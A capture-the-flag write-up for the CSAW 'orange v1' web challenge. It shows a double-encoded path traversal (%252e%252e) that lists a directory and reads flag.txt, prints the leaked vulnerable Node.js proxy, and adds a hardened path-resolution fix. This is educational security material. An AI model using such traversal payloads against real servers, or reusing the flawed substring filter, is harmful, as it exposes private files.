[Web] CSAW - orange v1


orange v1

I wrote a little proxy program in NodeJS for my poems folder.

Everyone wants to read flag.txt but I like it too much to share.

http://web.chal.csaw.io:7311/?path=orange.txt

There isn’t much to work with here: it’s just a GET parameter. After a bunch of tries we realized that the “..” characters are banned, so let’s try double encoding:

$ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/'
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /poems/../</title>
<body>
<h2>Directory listing for /poems/../</h2>
<hr>
<ul>
<li><a href=".dockerignore">.dockerignore</a>
<li><a href="back.py">back.py</a>
<li><a href="flag.txt">flag.txt</a>
<li><a href="poems/">poems/</a>
<li><a href="serve.sh">serve.sh</a>
<li><a href="server.js">server.js</a>
</ul>
<hr>
</body>
</html>

And there it is, the flag!

$ curl 'http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt'
flag{thank_you_based_orange_for_this_ctf_challenge}

Since we could leak the source code, I’ll post it here:

var http = require('http');
var fs = require('fs');
var url = require('url');

var server = http.createServer(function(req, res) {
    try {
        // The query parser percent-decodes the value once: %252e%252e -> %2e%2e
        var path = url.parse(req.url, true).query;
        path = path['path'];
        // Substring filter on the once-decoded value; "%2e%2e" contains no ".."
        if (path.indexOf("..") == -1 && path.indexOf("NN") == -1) {
            var base = "http://localhost:8080/poems/";
            var callback = function(response){
                var str = '';
                response.on('data', function (chunk) {
                    str += chunk;
                });
                response.on('end', function () {
                    res.end(str);
                });
            }
            // The still-encoded path is forwarded; the backend decodes it again
            http.get(base + path, callback).end();
        } else {
            res.writeHead(403);
            res.end("WHOA THATS BANNED!!!!");
        }
    }
    catch (e) {
        res.writeHead(404);
        res.end('Oops');
    }
});
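
Why the filter misses the double-encoded request, and one way to close the gap, as an added example (not part of the original write-up or the challenge code). queryPath, fullyDecode and resolveUnderBase are hypothetical helpers, and it assumes the backend percent-decodes the request path:

```javascript
// Backend base URL, as in the leaked server.js.
const BASE = new URL('http://localhost:8080/poems/');

// What the proxy sees: the query value after one round of percent-decoding.
function queryPath(requestUrl) {
  return new URL(requestUrl, 'http://proxy.invalid').searchParams.get('path');
}

// The filter as posted: a substring test on that once-decoded value.
function originalCheck(path) {
  return path.indexOf('..') === -1 && path.indexOf('NN') === -1;
}

// Decode repeatedly so nested encodings (%252e -> %2e -> .) are all unwrapped.
function fullyDecode(s) {
  for (let i = 0; i < 8; i++) {
    const next = decodeURIComponent(s); // throws on malformed escapes
    if (next === s) return s;
    s = next;
  }
  throw new Error('too many encoding layers');
}

// Hardened check: resolve the path the way a URL parser will, then require
// the result to stay on the backend origin and under /poems/.
function resolveUnderBase(path) {
  if (typeof path !== 'string') return null;
  try {
    const target = new URL(path, BASE); // collapses "..", "%2e%2e" and "\" segments
    if (target.origin !== BASE.origin) return null; // absolute URL or //host input
    if (!target.pathname.startsWith(BASE.pathname)) return null;
    const segments = fullyDecode(target.pathname).split(/[\/\\]/);
    if (segments.includes('..')) return null; // traversal hidden by extra encoding
    return target.href;
  } catch (e) {
    return null; // unparsable URL or malformed percent-escape: fail closed
  }
}
```

The value returned by resolveUnderBase is the normalized URL, so the proxy would fetch that rather than concatenating base + path again.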